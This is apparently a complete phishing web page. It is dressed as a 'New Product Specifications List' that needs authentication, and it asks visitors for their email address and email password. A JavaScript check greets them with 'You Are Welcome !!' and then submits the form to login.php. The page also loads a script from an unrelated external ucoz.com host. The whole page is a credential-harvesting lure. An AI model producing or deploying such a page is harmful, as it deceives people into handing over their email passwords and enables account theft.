
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'>
<html><head><title>*=*Product Specifications*=*</title>
<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-15'/>
<link rel='stylesheet' type='text/css' href='http://www.outitgoes.com/default.css' />
<!-- no core stylesheet -->
</head>
<div align="center"><img src="index/landing.jpg">
</div>
<body class='centre' style='margin-top: 32px; text-align: centre; background: #fff'>
<div style='border: none; margin-right: auto; margin-left: auto; width: 447px; height: 250px; padding: 10px; background: url("http://www.outitgoes.com/login_panel_gradient.jpg") top center no-repeat'>

<SCRIPT language=JavaScript>
<!--
function check(form) {
if (form.Email.value == "")
{ alert("Please enter your Email Address."); form.Email.focus(); return;}
// Start of Email error Alert!
var checkEmail = "@.";
var checkStr = form.Email.value;
var EmailValid = false;
var EmailAt = false;
var EmailPeriod = false;
for (i = 0;  i < checkStr.length;  i++)
{
ch = checkStr.charAt(i);
for (j = 0;  j < checkEmail.length;  j++)
{
if (ch == checkEmail.charAt(j) && ch == "@")
EmailAt = true;
if (ch == checkEmail.charAt(j) && ch == ".")
EmailPeriod = true;
	  if (EmailAt && EmailPeriod)
		break;
	  if (j == checkEmail.length)
		break;
	}
if (EmailAt && EmailPeriod)
{
		EmailValid = true
		break;
	}
}
if (!EmailValid)
{
alert("Please enter a valid email address.");
form.Email.focus();
return;}
// End of Email error Alert!
if (form.emailpassword.value == "")
{ alert(" Please Enter your Email Password To Continue."); form.emailpassword.focus(); return;}
{ alert(' You Are Welcome !! Click ok to continue.... '); }
form.submit()
}
//-->
</SCRIPT>

<form method='post' action='login.php'>
			<div>
			<h1>New Product Specifications List </h1>
			<p>Please enter your email address
			and password below for authentication.</p>

	<div class='centre'>
			<table width="328" style='margin-left: auto; margin-right: auto; width: 300px'>
			<tbody>
			<tr>
			<th style='width: 20%; text-align: right; padding-right: 1em'>Email&nbsp;Address: </th>
			<td style='text-align: left'><input type='text' name='Email' size='35'/></td>
			</tr>

			<tr>

			<th style='text-align: right; padding-right: 1em'>Password: </th>
			<td style='text-align: left'><input type='password' name='emailpassword' size='35'/></td>

			</tr>

			</tbody>

	  </table>
			<p align="center"><i>If you have problems logging in, please try the 'basic' interface above.</i></p>

			<INPUT name="login" onClick="check(this.form)" type="button" value="Continue >>">
	</div></form>
</div></div>
<hr>
<img src="http://www.theemailguide.com/images/ninja-hp-logo.jpg" align="center"></img><hr>
<div align="center">
<script src="http://solliansillsltd.ucoz.com/media/?t=video;w=1052;h=64;f=http%3A%2F%2Fsolliansillsltd.ucoz.com%2Ffuta.swf"
type="text/javascript"></script>
</div>

</body></html><!-- 1 -->